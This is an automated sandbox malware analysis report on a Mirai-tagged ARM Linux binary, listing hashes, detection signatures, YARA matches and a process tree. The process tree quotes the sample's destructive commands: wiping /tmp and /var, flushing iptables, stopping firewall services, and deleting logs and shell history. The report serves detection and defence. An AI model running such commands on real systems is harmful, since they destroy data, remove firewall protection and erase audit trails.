Loading ...

Play interactive tourEdit tour

Linux Analysis Report arm7

Overview

General Information

Sample Name:arm7
Analysis ID:519695
MD5:9fc0975479e319f970c96eded3c2d001
SHA1:ff77399d8fb757636a3eae4909dbc33f4a00f09e
SHA256:f0c7eb51c588fa50e39bee022ea2c4f602842012b01f2ee025b91eb5eb50782f
Tags:Mirai
Infos:

Most interesting Screenshot:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill many processes (SIGKILL)
Deletes all firewall rules
Connects to many ports of the same IP (likely port scanning)
Sample deletes itself
Sample is packed with UPX
Uses known network protocols on non-standard ports
Deletes security-related log files
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Executes the "iptables" command used for managing IP filtering and manipulation
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:519695
Start date:11.11.2021
Start time:03:07:26
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 7s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:arm7
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.evad.lin@0/9@2/0
Warnings:
Show All
  • Connection to analysis system has been lost, crash info: Unknown
  • TCP Packets have been reduced to 100
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • arm7 (PID: 5234, Parent: 5112, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm7
    • arm7 New Fork (PID: 5236, Parent: 5234)
    • arm7 New Fork (PID: 5237, Parent: 5234)
    • arm7 New Fork (PID: 5239, Parent: 5234)
    • arm7 New Fork (PID: 5240, Parent: 5234)
    • arm7 New Fork (PID: 5241, Parent: 5234)
    • arm7 New Fork (PID: 5245, Parent: 5234)
      • arm7 New Fork (PID: 5249, Parent: 5245)
      • arm7 New Fork (PID: 5251, Parent: 5245)
        • arm7 New Fork (PID: 5253, Parent: 5251)
          • arm7 New Fork (PID: 5255, Parent: 5253)
          • sh (PID: 5255, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
            • sh New Fork (PID: 5257, Parent: 5255)
            • rm (PID: 5257, Parent: 5255, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/arm7 /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
          • arm7 New Fork (PID: 5262, Parent: 5253)
          • sh (PID: 5262, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /var/log/wtmp"
            • sh New Fork (PID: 5268, Parent: 5262)
            • rm (PID: 5268, Parent: 5262, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /var/log/wtmp
          • arm7 New Fork (PID: 5269, Parent: 5253)
          • sh (PID: 5269, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /tmp/*"
            • sh New Fork (PID: 5271, Parent: 5269)
            • rm (PID: 5271, Parent: 5269, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
          • arm7 New Fork (PID: 5272, Parent: 5253)
          • sh (PID: 5272, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /bin/netstat"
            • sh New Fork (PID: 5274, Parent: 5272)
            • rm (PID: 5274, Parent: 5272, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /bin/netstat
          • arm7 New Fork (PID: 5275, Parent: 5253)
          • sh (PID: 5275, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -F"
            • sh New Fork (PID: 5277, Parent: 5275)
            • iptables (PID: 5277, Parent: 5275, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
          • arm7 New Fork (PID: 5281, Parent: 5253)
          • sh (PID: 5281, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 busybox"
            • sh New Fork (PID: 5284, Parent: 5281)
            • pkill (PID: 5284, Parent: 5281, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
          • arm7 New Fork (PID: 5287, Parent: 5253)
          • sh (PID: 5287, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 perl"
            • sh New Fork (PID: 5289, Parent: 5287)
            • pkill (PID: 5289, Parent: 5287, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
          • arm7 New Fork (PID: 5292, Parent: 5253)
          • sh (PID: 5292, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 python"
            • sh New Fork (PID: 5294, Parent: 5292)
            • pkill (PID: 5294, Parent: 5292, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
          • arm7 New Fork (PID: 5295, Parent: 5253)
          • sh (PID: 5295, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "service iptables stop"
            • sh New Fork (PID: 5297, Parent: 5295)
            • service (PID: 5297, Parent: 5295, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
              • service New Fork (PID: 5299, Parent: 5297)
              • basename (PID: 5299, Parent: 5297, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5300, Parent: 5297)
              • basename (PID: 5300, Parent: 5297, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5301, Parent: 5297)
              • systemctl (PID: 5301, Parent: 5297, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
              • service New Fork (PID: 5302, Parent: 5297)
                • service New Fork (PID: 5303, Parent: 5302)
                • systemctl (PID: 5303, Parent: 5302, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                • service New Fork (PID: 5304, Parent: 5302)
                • sed (PID: 5304, Parent: 5302, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • systemctl (PID: 5297, Parent: 5295, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
          • arm7 New Fork (PID: 5308, Parent: 5253)
          • sh (PID: 5308, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
            • sh New Fork (PID: 5310, Parent: 5308)
            • iptables (PID: 5310, Parent: 5308, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
            • sh New Fork (PID: 5311, Parent: 5308)
            • iptables (PID: 5311, Parent: 5308, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
          • arm7 New Fork (PID: 5312, Parent: 5253)
          • sh (PID: 5312, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "service firewalld stop"
            • sh New Fork (PID: 5314, Parent: 5312)
            • service (PID: 5314, Parent: 5312, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewalld stop
              • service New Fork (PID: 5315, Parent: 5314)
              • basename (PID: 5315, Parent: 5314, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5316, Parent: 5314)
              • basename (PID: 5316, Parent: 5314, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5317, Parent: 5314)
              • systemctl (PID: 5317, Parent: 5314, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
              • service New Fork (PID: 5318, Parent: 5314)
                • service New Fork (PID: 5319, Parent: 5318)
                • systemctl (PID: 5319, Parent: 5318, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                • service New Fork (PID: 5320, Parent: 5318)
                • sed (PID: 5320, Parent: 5318, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • systemctl (PID: 5314, Parent: 5312, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewalld.service
          • arm7 New Fork (PID: 5323, Parent: 5253)
          • sh (PID: 5323, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf ~/.bash_history"
            • sh New Fork (PID: 5325, Parent: 5323)
            • rm (PID: 5325, Parent: 5323, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
          • arm7 New Fork (PID: 5326, Parent: 5253)
          • sh (PID: 5326, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "history -c"
  • systemd New Fork (PID: 5355, Parent: 1)
  • whoopsie (PID: 5355, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5364, Parent: 1)
  • sshd (PID: 5364, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5365, Parent: 1)
  • sshd (PID: 5365, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • gdm3 New Fork (PID: 5370, Parent: 1320)
  • Default (PID: 5370, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5373, Parent: 1320)
  • Default (PID: 5373, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5374, Parent: 1)
  • accounts-daemon (PID: 5374, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
  • systemd New Fork (PID: 5403, Parent: 1860)
  • pulseaudio (PID: 5403, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5428, Parent: 1)
  • gpu-manager (PID: 5428, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5429, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5430, Parent: 5429)
      • grep (PID: 5430, Parent: 5429, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5431, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5432, Parent: 5431)
      • grep (PID: 5432, Parent: 5431, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5433, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5434, Parent: 5433)
      • grep (PID: 5434, Parent: 5433, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5435, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5436, Parent: 5435)
      • grep (PID: 5436, Parent: 5435, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5437, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5438, Parent: 5437)
      • grep (PID: 5438, Parent: 5437, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5439, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5440, Parent: 5439)
      • grep (PID: 5440, Parent: 5439, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5441, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5442, Parent: 5441)
      • grep (PID: 5442, Parent: 5441, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5443, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5444, Parent: 5443)
      • grep (PID: 5444, Parent: 5443, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5445, Parent: 1)
  • generate-config (PID: 5445, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5446, Parent: 5445, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5452, Parent: 1)
  • gdm-wait-for-drm (PID: 5452, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • fusermount (PID: 5456, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5476, Parent: 1)
  • systemd-user-runtime-dir (PID: 5476, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 1000
  • systemd New Fork (PID: 5500, Parent: 1)
  • gdm3 (PID: 5500, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • systemd New Fork (PID: 5550, Parent: 1)
  • gpu-manager (PID: 5550, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5551, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5552, Parent: 5551)
      • grep (PID: 5552, Parent: 5551, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5553, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5554, Parent: 5553)
      • grep (PID: 5554, Parent: 5553, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5555, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5556, Parent: 5555)
      • grep (PID: 5556, Parent: 5555, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5557, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5558, Parent: 5557)
      • grep (PID: 5558, Parent: 5557, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5559, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5560, Parent: 5559)
      • grep (PID: 5560, Parent: 5559, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5561, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5562, Parent: 5561)
      • grep (PID: 5562, Parent: 5561, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5563, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5564, Parent: 5563)
      • grep (PID: 5564, Parent: 5563, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5565, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5566, Parent: 5565)
      • grep (PID: 5566, Parent: 5565, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5567, Parent: 1)
  • generate-config (PID: 5567, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5568, Parent: 5567, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5569, Parent: 1)
  • gdm-wait-for-drm (PID: 5569, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5579, Parent: 1)
  • gdm3 (PID: 5579, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
arm7SUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0xde2c:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0xde9b:$s2: $Id: UPX
  • 0xde4c:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
